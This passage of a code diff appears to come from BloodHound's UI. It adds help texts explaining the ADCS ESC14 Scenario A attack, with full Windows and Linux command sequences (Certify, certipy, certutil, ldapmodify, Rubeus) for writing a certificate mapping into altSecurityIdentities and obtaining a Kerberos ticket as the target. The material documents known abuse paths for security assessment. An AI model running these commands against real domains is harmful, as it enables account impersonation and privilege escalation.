Remove-AltSecIDMapping to remove the explicit certificate + mapping string from the 'altSecurityIdentities' attribute of the target principal: + + + { + 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + Targeted Kerberoast attack @@ -230,6 +344,11 @@ const WindowsAbuse: FC = Constrained Delegation attack. + + The permission also grants write access to the "altSecurityIdentities" attribute, which + enables an ADCS ESC14 Scenario A attack. + + Retrieve LAPS Password For systems using legacy LAPS, the following AD computer object properties are relevant: @@ -364,6 +483,116 @@ const WindowsAbuse: FC = 'Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt' } + + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the altSecurityIdentities of the + target referring to a certificate in the attacker's possession, and then use this + certificate to authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers + enrollment rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate + from a computer, or enrolling a new certificate as a computer: + + + { + 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is + unavailable and cannot be added to the Subject or Subject Alternate name, then it is because + the enrollee principal does not have their mail or dNSHostName attribute set, which is + required by the certificate template. The mail attribute can be set on both user and + computer objects but the dNSHostName attribute can only be set on computer objects. + Computers have validated write permission to their own dNSHostName attribute by default, but + neither users nor computers can write to their own mail attribute by default. + + + Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the + certificate as a PFX file: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber + or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + + Get the SHA1 hash of the certificate public key using certutil: + + + {`certutil.exe -dump -v .\\cert.pfx +… +Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 +…`} + + + Use Add-AltSecIDMapping to add the explicit certificate mapping string to the + 'altSecurityIdentities' attribute of the target principal: + + + { + 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + + Verify the that the mapping was added using Get-AltSecIDMapping: + + + {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} + + + Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target + identity, and the PFX-formatted certificate: + + + {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} + + + After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit + certificate mapping string from the 'altSecurityIdentities' attribute of the target + principal: + + + { + 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + ); } else { @@ -381,6 +610,11 @@ const WindowsAbuse: FC = Constrained Delegation attack. + + The permission also grants write access to the "altSecurityIdentities" attribute, which + enables an ADCS ESC14 Scenario A attack. + + Shadow Credentials attack To abuse the permission, use Whisker. @@ -465,6 +699,116 @@ const WindowsAbuse: FC = 'Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt' } + + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the altSecurityIdentities of the + target referring to a certificate in the attacker's possession, and then use this + certificate to authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers + enrollment rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate + from a computer, or enrolling a new certificate as a computer: + + + { + 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is + unavailable and cannot be added to the Subject or Subject Alternate name, then it is because + the enrollee principal does not have their mail or dNSHostName attribute set, which is + required by the certificate template. The mail attribute can be set on both user and + computer objects but the dNSHostName attribute can only be set on computer objects. + Computers have validated write permission to their own dNSHostName attribute by default, but + neither users nor computers can write to their own mail attribute by default. + + + Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the + certificate as a PFX file: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber + or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + + Get the SHA1 hash of the certificate public key using certutil: + + + {`certutil.exe -dump -v .\\cert.pfx +… +Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 +…`} + + + Use Add-AltSecIDMapping to add the explicit certificate mapping string to the + 'altSecurityIdentities' attribute of the target principal: + + + { + 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + + Verify the that the mapping was added using Get-AltSecIDMapping: + + + {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} + + + Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target + identity, and the PFX-formatted certificate: + + + {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} + + + After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit + certificate mapping string from the 'altSecurityIdentities' attribute of the target + principal: + + + { + 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + ); } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/LinuxAbuse.tsx index 0c6c338060d..fea3a480964 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/LinuxAbuse.tsx @@ -16,6 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; +import CodeController from '../CodeController/CodeController'; import { EdgeInfoProps } from '../index'; const LinuxAbuse: FC = ({ targetType }) => { @@ -109,6 +110,104 @@ const LinuxAbuse: FC = ({ targetType }) => { For other optional parameters, view the pyWhisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target + referring to a certificate in the attacker's possession, and then use this certificate to + authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers enrollment + rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable + and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee + principal does not have their mail or dNSHostName attribute set, which is required by the + certificate template. The mail attribute can be set on both user and computer objects but the + dNSHostName attribute can only be set on computer objects. Computers have validated write + permission to their own dNSHostName attribute by default, but neither users nor computers can + write to their own mail attribute by default. + + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + + Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate + and the IP of a DC: + + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping + string from the ‘altSecurityIdentities’ attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + ); case 'Computer': @@ -162,6 +261,104 @@ const LinuxAbuse: FC = ({ targetType }) => { For other optional parameters, view the pyWhisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target + referring to a certificate in the attacker's possession, and then use this certificate to + authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers enrollment + rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable + and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee + principal does not have their mail or dNSHostName attribute set, which is required by the + certificate template. The mail attribute can be set on both user and computer objects but the + dNSHostName attribute can only be set on computer objects. Computers have validated write + permission to their own dNSHostName attribute by default, but neither users nor computers can + write to their own mail attribute by default. + + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + + Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate + and the IP of a DC: + + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping + string from the ‘altSecurityIdentities’ attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + ); case 'GPO': diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/References.tsx index a4549ac9f6d..df61aa84fac 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/References.tsx @@ -110,6 +110,13 @@ const References: FC = () => { href='https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53'> https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53 +
+ + https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9 + ); }; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/WindowsAbuse.tsx index f18585e1d38..750ba9812f8 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericWrite/WindowsAbuse.tsx @@ -16,6 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; +import CodeController from '../CodeController/CodeController'; import { EdgeInfoProps } from '../index'; const WindowsAbuse: FC = ({ sourceName, sourceType, targetName, targetType }) => { @@ -73,6 +74,10 @@ const WindowsAbuse: FC = ({ sourceName, sourceType, targetName, t on the object and authenticate as the principal using kerberos PKINIT. This is equivalent to the "AddKeyCredentialLink" edge. + + The permission also grants write access to the "altSecurityIdentities" attribute, which enables + an ADCS ESC14 Scenario A attack. + Alternatively, GenericWrite enables {sourceName} to set a ServicePrincipalName (SPN) on the targeted user, which may be abused in a Targeted Kerberoast attack. @@ -95,6 +100,115 @@ const WindowsAbuse: FC = ({ sourceName, sourceType, targetName, t For other optional parameters, view the Whisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the altSecurityIdentities of the target + referring to a certificate in the attacker's possession, and then use this certificate to + authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers enrollment + rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + { + 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable + and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee + principal does not have their mail or dNSHostName attribute set, which is required by the + certificate template. The mail attribute can be set on both user and computer objects but the + dNSHostName attribute can only be set on computer objects. Computers have validated write + permission to their own dNSHostName attribute by default, but neither users nor computers can + write to their own mail attribute by default. + + + Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the + certificate as a PFX file: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + + Get the SHA1 hash of the certificate public key using certutil: + + + {`certutil.exe -dump -v .\\cert.pfx +… +Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 +…`} + + + Use Add-AltSecIDMapping to add the explicit certificate mapping string to the + 'altSecurityIdentities' attribute of the target principal: + + + { + 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + + Verify the that the mapping was added using Get-AltSecIDMapping: + + + {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} + + + Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target + identity, and the PFX-formatted certificate: + + + {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} + + + After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit certificate + mapping string from the 'altSecurityIdentities' attribute of the target principal: + + + { + 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + Targeted Kerberoast attack @@ -181,6 +295,11 @@ const WindowsAbuse: FC = ({ sourceName, sourceType, targetName, t Constrained Delegation attack. + + The permission also grants write access to the "altSecurityIdentities" attribute, which enables + an ADCS ESC14 Scenario A attack. + + Shadow Credentials attack To abuse the permission, use Whisker. @@ -265,6 +384,115 @@ const WindowsAbuse: FC = ({ sourceName, sourceType, targetName, t 'Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt' } + + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the altSecurityIdentities of the target + referring to a certificate in the attacker's possession, and then use this certificate to + authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers enrollment + rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + { + 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable + and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee + principal does not have their mail or dNSHostName attribute set, which is required by the + certificate template. The mail attribute can be set on both user and computer objects but the + dNSHostName attribute can only be set on computer objects. Computers have validated write + permission to their own dNSHostName attribute by default, but neither users nor computers can + write to their own mail attribute by default. + + + Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the + certificate as a PFX file: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + + Get the SHA1 hash of the certificate public key using certutil: + + + {`certutil.exe -dump -v .\\cert.pfx +… +Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 +…`} + + + Use Add-AltSecIDMapping to add the explicit certificate mapping string to the + 'altSecurityIdentities' attribute of the target principal: + + + { + 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + + Verify the that the mapping was added using Get-AltSecIDMapping: + + + {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} + + + Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target + identity, and the PFX-formatted certificate: + + + {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} + + + After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit certificate + mapping string from the 'altSecurityIdentities' attribute of the target principal: + + + { + 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + ); case 'OU': diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx index 809e77aceaf..214794a9ccf 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/Owns/LinuxAbuse.tsx @@ -201,6 +201,104 @@ const LinuxAbuse: FC = ( For other optional parameters, view the pyWhisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target + referring to a certificate in the attacker's possession, and then use this certificate to + authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers enrollment + rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable + and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee + principal does not have their mail or dNSHostName attribute set, which is required by the + certificate template. The mail attribute can be set on both user and computer objects but the + dNSHostName attribute can only be set on computer objects. Computers have validated write + permission to their own dNSHostName attribute by default, but neither users nor computers can + write to their own mail attribute by default. + + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + + Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate + and the IP of a DC: + + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping + string from the ‘altSecurityIdentities’ attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + ); case 'Computer': @@ -319,6 +417,106 @@ const LinuxAbuse: FC = ( For other optional parameters, view the pyWhisker documentation. + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the + target referring to a certificate in the attacker's possession, and then use this + certificate to authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. + Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry + (UPN) +
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the + certificate typically must be of a computer. By default, the ADCS certificate template{' '} + Computer (Machine) meets these requirements and grants Domain Computers + enrollment rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate + from a computer, or enrolling a new certificate as a computer: + + + { + 'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is + unavailable and cannot be added to the Subject or Subject Alternate name, then it is because + the enrollee principal does not have their mail or dNSHostName attribute set, which is + required by the certificate template. The mail attribute can be set on both user and + computer objects but the dNSHostName attribute can only be set on computer objects. + Computers have validated write permission to their own dNSHostName attribute by default, but + neither users nor computers can write to their own mail attribute by default. + + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber + or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + + Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'echo -e "dn: 